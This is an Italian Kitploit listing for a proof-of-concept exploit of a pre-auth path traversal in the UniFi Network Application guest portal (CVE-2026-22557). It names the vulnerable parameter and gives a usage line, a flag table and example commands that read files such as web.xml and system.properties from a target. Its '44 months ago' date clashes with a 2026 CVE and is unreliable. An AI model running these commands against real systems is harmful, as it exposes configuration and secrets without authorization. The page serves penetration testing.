Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-22557-PoC — PoC per la Path Traversal Pre-Auth di UniFi Network Application (CVE-2026-22557) | Kitploit
Strumenti/GitHubGitHub/thepotatoofdoom/cve-2026-22557-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubthepotatoofdoom/cve-2026-22557-poc

CVE-2026-22557-PoC

PoC per la Path Traversal Pre-Auth di UniFi Network Application (CVE-2026-22557)

Vedi Repository
44 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-22557 -- Path Traversal pre-autenticazione nella UniFi Network Application

Path traversal pre-autenticato nel portale ospiti della UniFi Network Application (/guest/s/{site}/login). Il parametro di query page_error viene passato a un resource loader senza validazione, consentendo a un attaccante non autenticato di leggere file dalla webapp (ad es. WEB-INF/web.xml).

Se la pagina del portale ospiti è stata personalizzata, il resource loader sembra ripiegare su un ramo FileInputStream grezzo che può accedere a file arbitrari sul sistema sottostante al di fuori della context root. Non l'ho ancora confermato e indagherò ulteriormente se avrò tempo.

Utilizzo

root@kitploit:~
pip install requests
python CVE-2026-22557.py <target_url> [-f FILE] [-g GUEST_PATH] [-o OUTPUT] [-x PROXY]
FlagDescrizionePredefinito
targetURL del target (ad es. https://host:8843)(obbligatorio)
-fPercorso relativo da leggere../../web.xml
-gPercorso del portale ospiti/guest/s/default/login
-oScrive la risposta su file(stdout)
-xURL del proxy(nessuno)

Esempi

image
root@kitploit:~
# Predefinito -- legge WEB-INF/web.xml (portale ospiti HTTPS)
python CVE-2026-22557.py https://192.168.1.1:8843

# Portale ospiti HTTP
python CVE-2026-22557.py http://192.168.1.1:8880

# Legge una risorsa dal classpath
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../system.properties

# Legge lo schema API e lo salva su file
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../api/fields/Setting.json -o setting.json

# Nome del sito diverso
python CVE-2026-22557.py https://192.168.1.1:8843 -g /guest/s/mysite/login

# Tramite un proxy
python CVE-2026-22557.py https://192.168.1.1:8843 -x http://127.0.0.1:8080
Scarica lo strumento